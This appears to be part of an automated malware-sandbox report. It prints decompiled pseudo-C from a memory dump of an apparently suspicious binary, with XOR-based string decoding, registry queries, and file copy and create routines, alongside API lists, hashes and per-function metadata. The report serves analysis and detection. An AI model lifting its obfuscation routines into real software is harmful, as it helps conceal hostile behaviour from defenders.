									__eflags = _t236;
									L40:
									E00217FE3(_t240);
									return _t236;
								}
							}
						}
						__eflags = _t228 == 1;
						if(_t228 == 1) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags != 0) {
								_t229 = _a8;
								_v16 = _t210;
								_v24 = _t229;
								_t143 =  *((intOrPtr*)(0x24bd98 + _v12 * 4));
								goto L22;
							}
							goto L14;
						} else {
							_t229 = _a8;
							_v16 = _t210;
							_v24 = _t229;
							goto L22;
						}
					}
					L6:
					 *(E0020B981(__eflags)) =  *_t145 & 0x00000000;
					 *((intOrPtr*)(E0020B994(__eflags))) = 0x16;
					goto L60;
				} else {
					 *(E0020B981(_t246)) =  *_t197 & 0x00000000;
					_t139 = E0020B994(_t246);
					 *_t139 = 9;
					L61:
					return _t139 | 0xffffffff;
				}
			}

0x00219856
0x0021985a
0x0021985d
0x00219877
0x00219879
0x00219bde
0x00219bde
0x00219be3
0x00219be3
0x00219beb
0x00219bf1
0x00219bf1
0x00000000
0x00219bf1
0x0021987f
0x00219885
0x00000000
0x00000000
0x0021988f
0x00219895
0x00219898
0x0021989b
0x002198a5
0x002198a8
0x002198ab
0x002198af
0x002198b1
0x00000000
0x00000000
0x002198b7
0x002198ba
0x002198c0
0x002198da
0x002198dc
0x00219bda
0x00000000
0x00219bda
0x002198e2
0x002198e5
0x00000000
0x00000000
0x002198eb
0x002198ef
0x00000000
0x00000000
0x002198f5
0x002198f8
0x002198fc
0x00219903
0x00219905
0x00219905
0x00219908
0x0021995d
0x0021995f
0x00219925
0x0021992a
0x00219931
0x00219937
0x00000000
0x00219961
0x00219963
0x00219964
0x00219966
0x00219969
0x0021996b
0x0021996d
0x0021996f
0x0021996f
0x0021997a
0x0021997c
0x00219983
0x00219988
0x0021998b
0x0021998e
0x00219990
0x002199b4
0x002199bc
0x002199bf
0x002199c6
0x002199cd
0x002199d1
0x002199d3
0x002199d6
0x002199dd
0x002199dd
0x002199e0
0x002199e2
0x002199e5
0x002199ea
0x002199ed
0x002199f6
0x002199fa
0x002199fd
0x002199ff
0x00219a05
0x00219a07
0x00219a10
0x00219a11
0x00219a13
0x00219a17
0x00219a18
0x00219a1c
0x00219a1f
0x00219a29
0x00219a2e
0x00219a31
0x00219a40
0x00219a44
0x00219a47
0x00219a49
0x00219a4b
0x00219a4d
0x00219a52
0x00219a54
0x00219a58
0x00219a59
0x00219a5f
0x00219a69
0x00219a6a
0x00219a6d
0x00219a72
0x00219a75
0x00219a84
0x00219a88
0x00219a8b
0x00219a8d
0x00219a8f
0x00219a91
0x00219a93
0x00219a99
0x00219a99
0x00219a9a
0x00219aa9
0x00219aac
0x00219aad
0x00219aad
0x00219a91
0x00219a8d
0x00219a75
0x00219a4d
0x00219a49
0x00219a31
0x00219a07
0x002199ff
0x00219ab3
0x00219ab9
0x00219abb
0x00219b2e
0x00219b2e
0x00219b32
0x00219b42
0x00219b48
0x00219b4a
0x00219ba6
0x00219ba6
0x00219bae
0x00219baf
0x00219bb1
0x00219bca
0x00219bcd
0x00219b0a
0x00219b0b
0x00000000
0x00219b10
0x00219bd3
0x00000000
0x00219bd3
0x00219bb8
0x00219bc3
0x00000000
0x00219bc3
0x00219b4c
0x00219b4f
0x00219b52
0x00000000
0x00000000
0x00219b54
0x00219b54
0x00219b57
0x00219b5a
0x00219b5d
0x00219b64
0x00219b69
0x00219b6b
0x00219b6f
0x00219b8a
0x00219b8e
0x00219b8f
0x00219b92
0x00219b93
0x00219b9f
0x00219b95
0x00219b95
0x00219b95
0x00219b71
0x00219b71
0x00219b71
0x00219b7c
0x00219b81
0x00219b84
0x00219b84
0x00000000
0x00219b69
0x00219ac0
0x00219ac3
0x00219aca
0x00219acf
0x00000000
0x00000000
0x00219ad8
0x00219ade
0x00219ae0
0x00000000
0x00000000
0x00219ae2
0x00219ae6
0x00000000
0x00000000
0x00219afa
0x00219b00
0x00219b02
0x00219b26
0x00219b29
0x00000000
0x00219b29
0x00219b04
0x00000000
0x00219992
0x00219997
0x002199a2
0x00219b11
0x00219b11
0x00219b11
0x00219b14
0x00219b15
0x00000000
0x00219b1d
0x00219990
0x0021995f
0x0021990a
0x0021990d
0x00219921
0x00219923
0x00219944
0x00219947
0x0021994a
0x0021994d
0x00000000
0x0021994d
0x00000000
0x0021990f
0x0021990f
0x00219912
0x00219915
0x00000000
0x00219915
0x0021990d
0x002198c2
0x002198c7
0x002198cf
0x00000000
0x0021985f
0x00219864
0x00219867
0x0021986c
0x00219bf6
0x00000000
0x00219bf6

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1bd9c0478eacbf7fa5e5b058cebf2e56ec7f8caa901915fef202b81c2cb4303
Instruction ID: 8efed273a8927641ed2f3393e3102b71cb375f0a0da84a630c45069d7023e144
Opcode Fuzzy Hash: c1bd9c0478eacbf7fa5e5b058cebf2e56ec7f8caa901915fef202b81c2cb4303
Instruction Fuzzy Hash: 7FC1C470E282099FDB11DF98E894BEDBBF0AF69304F104059E54597392D7719AE1CF60

Uniqueness

Uniqueness Score: -1.00%

Function 001D6EAD, Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 322
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E001D6EAD() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t159;
				char _t168;
				void* _t170;
				signed int _t172;
				void* _t177;
				void* _t183;
				void* _t186;
				signed int _t190;
				void* _t192;
				void* _t193;
				void* _t194;
				void* _t207;
				void* _t218;
				signed int _t219;
				char _t223;
				char _t237;
				intOrPtr _t238;
				intOrPtr _t245;
				signed int _t248;
				char _t252;
				char _t257;
				char _t259;
				signed char _t260;
				signed int _t282;
				signed char _t285;
				signed char _t287;
				signed char _t289;
				signed char _t291;
				char _t292;
				void* _t299;
				intOrPtr _t300;
				signed int _t303;
				signed int _t305;
				void* _t306;
				signed int _t307;
				intOrPtr _t309;
				void* _t311;
				void* _t312;
				signed int _t314;
				void* _t315;
				void* _t317;
				intOrPtr _t318;

				L00227790(0x228965, _t315);
				_t318 = _t317 - 0x250;
				_t223 = 0;
				 *((intOrPtr*)(_t315 - 4)) = 0;
				_push(_t306);
				_t158 =  >=  ?  *0x248090 : 0x248090;
				_push(_t299);
				 *((intOrPtr*)(_t315 - 0x10)) = _t318;
				 *(_t315 - 0x34) = 0;
				_t159 = E00206A2E(0, _t299, _t306,  *0x2480a4 - 0x10,  >=  ?  *0x248090 : 0x248090);
				 *((char*)(_t315 - 0x50)) = 0;
				_push( *((intOrPtr*)(_t315 - 0x50)));
				 *((intOrPtr*)(_t315 - 0x1c)) = _t159;
				E001D4BA2(_t315 - 0x1c);
				 *((char*)(_t315 - 4)) = 1;
				E001CAF03(0, _t315 - 0x84, _t299,  *0x2480a4 - 0x10, _t315 - 0x74); // executed
				E001D2D4F(_t315 - 0x74);
				E001CBF31(_t315 - 0x5c, _t315 - 0x84);
				_t300 =  *((intOrPtr*)(_t315 - 0x5c));
				_t307 =  *(_t315 - 0x58);
				 *((intOrPtr*)(_t315 - 0x7c)) = _t300;
				 *(_t315 - 0x78) = _t307;
				E001CBF31(_t315 - 0xd4, _t315 - 0x84);
				_t233 =  *((intOrPtr*)(_t315 - 0xd0));
				asm("xorps xmm0, xmm0");
				asm("movlpd [ebp-0x5c], xmm0");
				_t168 = 0;
				 *((intOrPtr*)(_t315 - 0x5c)) = 0;
				 *(_t315 - 0x58) = 0;
				if( *((intOrPtr*)(_t315 - 0xd0)) != 0) {
					E001C9597(_t233);
					_t168 = 0;
				}
				 *((char*)(_t315 - 4)) = 5;
				while(_t300 != _t168) {
					 *((char*)(_t315 - 4)) = 6;
					_t285 = 0x7e;
					 *((intOrPtr*)(_t315 - 0x4a)) = 0x121f097e;
					_t237 = _t223;
					 *((intOrPtr*)(_t315 - 0x46)) = 0x500a1b12;
					 *((intOrPtr*)(_t315 - 0x42)) = 0xa1f1a;
					while(1) {
						 *(_t315 + _t237 - 0x49) =  *(_t315 + _t237 - 0x49) ^ _t285;
						_t237 = _t237 + 1;
						if(_t237 >= 0xa) {
							break;
						}
						_t285 =  *((intOrPtr*)(_t315 - 0x4a));
					}
					_t309 = _t300 + 0x20;
					 *((char*)(_t315 - 0x3f)) = _t223;
					 *((intOrPtr*)(_t315 - 0x50)) = _t309;
					_t238 = _t309;
					_t170 = E001CA1C2(_t238, _t315 - 0xcc);
					_push(_t238);
					 *((char*)(_t315 - 4)) = 7;
					E001D3654(_t170, _t315 - 0x74);
					_t303 =  *(_t315 - 0x34) | 0x00000004;
					 *(_t315 - 0x34) = _t303;
					_t172 = E001D3D6E(_t315 - 0x74, _t315 - 0x49, _t303, _t309);
					E001D2F2D(_t315 - 0x74);
					 *((char*)(_t315 - 4)) = 6;
					E001D2D4F(_t315 - 0xcc);
					__eflags = _t172;
					if(_t172 == 0) {
						_t223 = 0;
						__eflags = 0;
					} else {
						_t245 = _t309;
						_t177 = E001CA187(_t245, _t315 - 0xf8);
						_push(_t245);
						 *((char*)(_t315 - 4)) = 8;
						E001D3654(_t177, _t315 - 0xb4);
						 *(_t315 - 0x34) = _t303 | 0x00000020;
						_t248 = _t315 - 0xf8;
						 *((char*)(_t315 - 4)) = 0xa;
						E001D2D4F(_t248);
						__eflags =  *((intOrPtr*)(_t315 - 0xa0)) - 0x10;
						_t305 =  *(_t315 - 0xa4);
						_t311 =  >=  ?  *((void*)(_t315 - 0xb4)) : _t315 - 0xb4;
						_t223 = 0;
						__eflags = _t305;
						if(_t305 == 0) {
							L14:
							_t249 = _t248 | 0xffffffff;
							__eflags = _t248 | 0xffffffff;
						} else {
							E00202C70(_t305, _t315 - 0x1fc, 0, 0x100);
							_t282 = _t248 | 0xffffffff;
							 *((char*)(_t315 - 0x1a0)) = 1;
							_t218 = _t305 - 1;
							_t318 = _t318 + 0xc;
							__eflags = _t218 - _t282;
							_t283 =  <  ? _t218 : _t282;
							_t248 = ( <  ? _t218 : _t282) + _t311;
							while(1) {
								_t219 =  *_t248 & 0x000000ff;
								__eflags =  *(_t315 + _t219 - 0x1fc);
								if( *(_t315 + _t219 - 0x1fc) != 0) {
									break;
								}
								__eflags = _t248 - _t311;
								if(_t248 == _t311) {
									goto L14;
								} else {
									_t248 = _t248 - 1;
									__eflags = _t248;
									continue;
								}
								goto L15;
							}
							_t249 = _t248 - _t311;
						}
						L15:
						_t312 = E001D22C7(_t315 - 0xb4, _t305, _t311, _t315 - 0xcc, _t249 + 1, 0xffffffff);
						_t183 = _t315 - 0xb4;
						__eflags = _t183 - _t312;
						if(_t183 != _t312) {
							E001D2F2D(_t183);
							E001D3096(_t315 - 0xb4, _t312);
						}
						E001D2F2D(_t315 - 0xcc);
						_t287 = 0x5b;
						 *((intOrPtr*)(_t315 - 0x25)) = 0x373a0c5b;
						 *((intOrPtr*)(_t315 - 0x21)) = 0x282f3e37;
						_t252 = _t223;
						 *((char*)(_t315 - 0x1d)) = _t223;
						while(1) {
							 *(_t315 + _t252 - 0x24) =  *(_t315 + _t252 - 0x24) ^ _t287;
							_t252 = _t252 + 1;
							__eflags = _t252 - 7;
							if(_t252 >= 7) {
								break;
							}
							_t287 =  *((intOrPtr*)(_t315 - 0x25));
						}
						 *((char*)(_t315 - 0x1d)) = _t223;
						_t186 = L001F57CC(E001F5C6D(), _t315 - 0x24);
						 *((intOrPtr*)(_t315 - 0x74)) = _t223;
						 *((intOrPtr*)(_t315 - 0x64)) = _t223;
						 *((intOrPtr*)(_t315 - 0x60)) = 0xf;
						L001D2F8E(_t186);
						E001CB7F6(_t315 - 0x74);
						E001D2F2D(_t315 - 0x74);
						_t289 = 0x43;
						 *((intOrPtr*)(_t315 - 0x2e)) = 0x222c1143;
						 *((intOrPtr*)(_t315 - 0x2a)) = 0x242d2a2e;
						_t257 = _t223;
						 *((char*)(_t315 - 0x26)) = _t223;
						while(1) {
							 *(_t315 + _t257 - 0x2d) =  *(_t315 + _t257 - 0x2d) ^ _t289;
							_t257 = _t257 + 1;
							__eflags = _t257 - 7;
							if(_t257 >= 7) {
								break;
							}
							_t289 =  *((intOrPtr*)(_t315 - 0x2e));
						}
						 *((char*)(_t315 - 0x26)) = _t223;
						_t190 = E001D3D6E(_t315 - 0xb4, _t315 - 0x2d, _t305, _t312);
						_t259 = _t223;
						__eflags = _t190;
						if(_t190 == 0) {
							_t291 = 0x5d;
							 *((intOrPtr*)(_t315 - 0x1c)) = 0x3c39735d;
							 *((short*)(_t315 - 0x18)) = 0x29;
							while(1) {
								 *(_t315 + _t259 - 0x1b) =  *(_t315 + _t259 - 0x1b) ^ _t291;
								_t259 = _t259 + 1;
								__eflags = _t259 - 4;
								if(_t259 >= 4) {
									break;
								}
								_t121 = _t315 - 0x1c; // 0x3c39735d
								_t291 =  *_t121;
							}
							 *((char*)(_t315 - 0x17)) = _t223;
							_t260 = 5;
							 *((intOrPtr*)(_t315 - 0x3e)) = 0x69645205;
							_t292 = _t223;
							 *((intOrPtr*)(_t315 - 0x3a)) = 0x76716069;
							 *((short*)(_t315 - 0x36)) = 0x59;
							while(1) {
								 *(_t315 + _t292 - 0x3d) =  *(_t315 + _t292 - 0x3d) ^ _t260;
								_t292 = _t292 + 1;
								__eflags = _t292 - 8;
								if(_t292 >= 8) {
									break;
								}
								_t260 =  *((intOrPtr*)(_t315 - 0x3e));
							}
							 *((char*)(_t315 - 0x35)) = _t223;
							_t192 = L001F57CC(E001F5C6D(), _t315 - 0x3d);
							_push(_t315 - 0xb4);
							_t193 = E001DC25D(_t223, _t315 - 0x9c, _t192);
							 *((char*)(_t315 - 4)) = 0xc;
							_t194 = E001DC2EA(_t315 - 0x74, _t193, _t315 - 0x1b);
							_pop(_t267);
							 *((char*)(_t315 - 4)) = 0xd;
							E001D3654( *((intOrPtr*)(_t315 - 0x50)), _t315 - 0xcc);
							E001D5505(_t315 - 0xcc, _t194);
							E001D2F2D(_t315 - 0xcc);
							E001D2F2D(_t315 - 0x74);
							E001D2F2D(_t315 - 0x9c);
							_t314 = 0x800;
						} else {
							asm("movaps xmm0, [0x23d930]");
							asm("movups [ebp-0x98], xmm0");
							 *((intOrPtr*)(_t315 - 0x88)) = 0x554045;
							do {
								 *(_t315 + _t259 - 0x97) =  *(_t315 + _t259 - 0x97) ^  *(_t315 - 0x98);
								_t259 = _t259 + 1;
								__eflags = _t259 - 0x12;
							} while (_t259 < 0x12);
							 *((char*)(_t315 - 0x85)) = _t223;
							_t207 = L001F57CC(E001F5C6D(), _t315 - 0x97);
							 *((intOrPtr*)(_t315 - 0x74)) = _t223;
							 *((intOrPtr*)(_t315 - 0x64)) = _t223;
							 *((intOrPtr*)(_t315 - 0x60)) = 0xf;
							 *((char*)(_t315 - 0x74)) = _t223;
							L001D2F8E(_t207);
							_push(_t315 - 0x74);
							 *((char*)(_t315 - 4)) = 0xb;
							E001D3654( *((intOrPtr*)(_t315 - 0x50)), _t315 - 0xcc);
							E001D5505(_t315 - 0xcc, _t315 - 0x74);
							E001D2F2D(_t315 - 0xcc);
							E001D2F2D(_t315 - 0x74);
							_t314 = 0x100;
						}
						E001D2F2D(_t315 - 0xb4);
						 *(_t315 - 0x34) =  *(_t315 - 0x34) | _t314;
					}
					 *((intOrPtr*)(_t315 - 4)) = 5;
					E001CAF48(_t223, _t315 - 0x7c, __eflags); // executed
					_t307 =  *(_t315 - 0x78);
					_t300 =  *((intOrPtr*)(_t315 - 0x7c));
					_t168 =  *((intOrPtr*)(_t315 - 0x5c));
				}
				__eflags = _t307;
				if(_t307 != 0) {
					_t168 = E001C9597(_t307);
				}
				_t234 =  *(_t315 - 0x80);
				__eflags =  *(_t315 - 0x80);
				if( *(_t315 - 0x80) != 0) {
					_t168 = E001C9597(_t234);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t315 - 0xc));
				return _t168;
			}

0x001d6eb2
0x001d6eb7
0x001d6ebe
0x001d6ec5
0x001d6ecf
0x001d6ed0
0x001d6ed7
0x001d6ed8
0x001d6edc
0x001d6edf
0x001d6ee5
0x001d6eeb
0x001d6ef1
0x001d6ef4
0x001d6efd
0x001d6f08
0x001d6f10
0x001d6f1f
0x001d6f24
0x001d6f27
0x001d6f2a
0x001d6f2d
0x001d6f3d
0x001d6f42
0x001d6f48
0x001d6f4b
0x001d6f50
0x001d6f52
0x001d6f55
0x001d6f5a
0x001d6f5c
0x001d6f61
0x001d6f61
0x001d6f63
0x001d6f67
0x001d6f6f
0x001d6f73
0x001d6f75
0x001d6f7c
0x001d6f7e
0x001d6f85
0x001d6f8c
0x001d6f8c
0x001d6f90
0x001d6f94
0x00000000
0x00000000
0x001d6f96
0x001d6f96
0x001d6f9b
0x001d6f9e
0x001d6fa7
0x001d6fab
0x001d6fad
0x001d6fb2
0x001d6fb6
0x001d6fbd
0x001d6fc8
0x001d6fce
0x001d6fd1
0x001d6fdb
0x001d6fe6
0x001d6fea
0x001d6fef
0x001d6ff1
0x001d730b
0x001d730b
0x001d6ff7
0x001d6ffd
0x001d7000
0x001d7005
0x001d700c
0x001d7013
0x001d701b
0x001d701e
0x001d7024
0x001d7028
0x001d702d
0x001d703a
0x001d7040
0x001d7047
0x001d7049
0x001d704b
0x001d708f
0x001d708f
0x001d708f
0x001d704d
0x001d705a
0x001d705f
0x001d7062
0x001d7069
0x001d706c
0x001d706f
0x001d7071
0x001d7074
0x001d707d
0x001d707d
0x001d7087
0x001d7089
0x00000000
0x00000000
0x001d7078
0x001d707a
0x00000000
0x001d707c
0x001d707c
0x001d707c
0x00000000
0x001d707c
0x00000000
0x001d707a
0x001d708b
0x001d708b
0x001d7092
0x001d70aa
0x001d70ac
0x001d70b2
0x001d70b4
0x001d70b8
0x001d70c4
0x001d70c4
0x001d70cf
0x001d70d4
0x001d70d6
0x001d70dd
0x001d70e4
0x001d70e6
0x001d70e9
0x001d70e9
0x001d70ed
0x001d70ee
0x001d70f1
0x00000000
0x00000000
0x001d70f3
0x001d70f3
0x001d70f8
0x001d7105
0x001d710e
0x001d7111
0x001d7114
0x001d711b
0x001d7123
0x001d712b
0x001d7130
0x001d7132
0x001d7139
0x001d7140
0x001d7142
0x001d7145
0x001d7145
0x001d7149
0x001d714a
0x001d714d
0x00000000
0x00000000
0x001d714f
0x001d714f
0x001d7157
0x001d7160
0x001d7165
0x001d7167
0x001d7169
0x001d7211
0x001d7213
0x001d721a
0x001d7220
0x001d7220
0x001d7224
0x001d7225
0x001d7228
0x00000000
0x00000000
0x001d722a
0x001d722a
0x001d722a
0x001d722f
0x001d7232
0x001d7234
0x001d723b
0x001d723d
0x001d7244
0x001d724a
0x001d724a
0x001d724e
0x001d724f
0x001d7252
0x00000000
0x00000000
0x001d7254
0x001d7254
0x001d7259
0x001d7266
0x001d7273
0x001d727a
0x001d7283
0x001d728d
0x001d7292
0x001d72a0
0x001d72a4
0x001d72b1
0x001d72bc
0x001d72c4
0x001d72cf
0x001d72d4
0x001d716f
0x001d716f
0x001d7176
0x001d717d
0x001d7187
0x001d7194
0x001d719b
0x001d719c
0x001d719c
0x001d71a1
0x001d71b4
0x001d71b9
0x001d71c0
0x001d71c3
0x001d71ca
0x001d71cd
0x001d71d2
0x001d71dd
0x001d71e1
0x001d71ef
0x001d71fa
0x001d7202
0x001d7207
0x001d7207
0x001d72df
0x001d72e9
0x001d72e9
0x001d7310
0x001d7317
0x001d731c
0x001d731f
0x001d7322
0x001d7322
0x001d732a
0x001d732c
0x001d7330
0x001d7330
0x001d7335
0x001d7338
0x001d733a
0x001d733c
0x001d733c
0x001d7346
0x001d734f

APIs

__EH_prolog.LIBCMT ref: 001D6EB2

Part of subcall function 001CAF03: __EH_prolog.LIBCMT ref: 001CAF08

Part of subcall function 001D2D4F: _Deallocate.LIBCONCRT ref: 001D2D64

Strings

]s9<), xrefs: 001D722A
i`qv, xrefs: 001D723D
.*-$, xrefs: 001D7139
7>/(, xrefs: 001D70DD
Y, xrefs: 001D7244

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog$Deallocate
String ID: .*-$$7>/($Y$]s9<)$i`qv
API String ID: 2428181759-1666397537
Opcode ID: 669d2562a0f8c884b9072e4085b010f8cac4c912ec9d8d76a5bcfd8233a8ce64
Instruction ID: e446a4ebed39bbeded08033e66b83fc4d89f3a2d2d5d7f026cf0caf7d3607d26
Opcode Fuzzy Hash: 669d2562a0f8c884b9072e4085b010f8cac4c912ec9d8d76a5bcfd8233a8ce64
Instruction Fuzzy Hash: 2DD1A070D05299DACF15DFA4D991AEDBBB1AF25300F2042AEE45A77382EB305B48CF51

Uniqueness

Uniqueness Score: -1.00%

Function 001F8AD4, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 120registryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001F8AD9
RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,00000001,74B624D0,00000000,00000008), ref: 001F8B5B
RegQueryValueExA.KERNEL32(00000001,?,00000000,00000012,?,00000040), ref: 001F8BA8
RegCloseKey.ADVAPI32(00000001), ref: 001F8BC9

Strings

@, xrefs: 001F8B16
$iEGLMJAcQM@, xrefs: 001F8B89

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseH_prologOpenQueryValue
String ID: $iEGLMJAcQM@$@
API String ID: 1233982722-1058998065
Opcode ID: 6b01edc3faeb51b99a240cfee55f43afa2dca166c2da37f0a259976cbfa6ebfc
Instruction ID: 0d988f615afce9b22781a217cda394fae4e3b9bd2cc16397249450f1770bbd4e
Opcode Fuzzy Hash: 6b01edc3faeb51b99a240cfee55f43afa2dca166c2da37f0a259976cbfa6ebfc
Instruction Fuzzy Hash: E9516AB1D0525C9FDB21DFA8D880AEEFBF9BF29300F14416AE545A7212DB705A49CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001F4E00, Relevance: 10.6, APIs: 7, Instructions: 75stringregistryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,001F549A,00000000,00020019,001F549A,?,?,001F5370,00000001,?,?,?,001F549A), ref: 001F4E25
lstrlenW.KERNEL32(001F549A,?,?,001F5370,00000001,?,?,?,001F549A), ref: 001F4E4B
lstrcpyW.KERNEL32 ref: 001F4E68
lstrcatW.KERNEL32(00000000,0023CC6C), ref: 001F4E74
lstrcatW.KERNEL32(00000000,?), ref: 001F4E82
RegEnumKeyExW.ADVAPI32(001F549A,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,001F5370,00000001), ref: 001F4EB6
RegCloseKey.ADVAPI32(001F549A,?,?,001F5370,00000001,?,?,?,001F549A), ref: 001F4EC3

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcat$CloseEnumOpenlstrcpylstrlen
String ID:
API String ID: 2943937744-0
Opcode ID: 6ca497a3b938e2546c55f5e566bc300577d544073c2cc3dfc8cb0e4708c944f1
Instruction ID: 9b209ae40008ec1c9144538d052c8cd2dc9321a3eece6b7b0a040bd89e4392bf
Opcode Fuzzy Hash: 6ca497a3b938e2546c55f5e566bc300577d544073c2cc3dfc8cb0e4708c944f1
Instruction Fuzzy Hash: AA214A76901128BFEB219B90ED49DEF7BBCEF09351F004091F909E2121DB749B56CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 001FEDE9, Relevance: 6.1, APIs: 4, Instructions: 114fileCOMMON

Download Yara Rule

APIs

Part of subcall function 001FEC21: CopyFileW.KERNEL32(?,?,00000000,?,?,?,001FEF0B,?,001CB6A1,00000000,?,?,?,?,001CB6A1,?), ref: 001FEC31

CreateFileW.KERNEL32(?,00000081,00000000,00000000,00000003,00000000,00000000,?,001CB6A1,00000001,?,?,?,?,001CB6A1,?), ref: 001FEE31
GetLastError.KERNEL32(?,?,001CB6A1,?,?,?,?,?,?,00000000,?), ref: 001FEE3E

Part of subcall function 001FEC56: CloseHandle.KERNEL32(000000FF,?,001FF31E,?,?,?,00000080,?), ref: 001FEC62

CreateFileW.KERNEL32(001CB6A1,00000082,00000000,00000000,00000003,00000000,00000000,?,?,001CB6A1,?,?), ref: 001FEE6F
GetLastError.KERNEL32(?,?,001CB6A1,?,?,?,?,?,?,00000000,?), ref: 001FEE7C

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$CreateErrorLast$CloseCopyHandle
String ID:
API String ID: 1748377786-0
Opcode ID: 6fb75a562f144972a88a335c90e6221100bf77cc97ae780cad93023e316aa020
Instruction ID: d813b054efae33749b56cffeac5e34430ef0d5ef9be51c07b44d18a26f0d50ca
Opcode Fuzzy Hash: 6fb75a562f144972a88a335c90e6221100bf77cc97ae780cad93023e316aa020
Instruction Fuzzy Hash: 71319C71A0021DBBEB21ABB8AC859BF7AE8AF54710B040521FF24D6172D770CE019760

Uniqueness

Uniqueness Score: -1.00%

Function 001E026B, Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,?), ref: 001E027F
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001E028D
GetFileAttributesA.KERNEL32(?), ref: 001E0310
CreateDirectoryA.KERNEL32(?,00000000), ref: 001E0324

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: 10fea77651c7a3f914534ca4f30000665cc082af470ee811fcb07d89061e34a8
Instruction ID: 34f8d8e6256c148b4da5a8dea7d0076802329004cc1e9e40683f7d1f66c65d4e
Opcode Fuzzy Hash: 10fea77651c7a3f914534ca4f30000665cc082af470ee811fcb07d89061e34a8
Instruction Fuzzy Hash: 5D115972800B5417CB3246A9AC8CBDE77AC9F59710F640295E695931D2DBF04EC68A64

Uniqueness

Uniqueness Score: -1.00%

Function 001CB7F6, Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

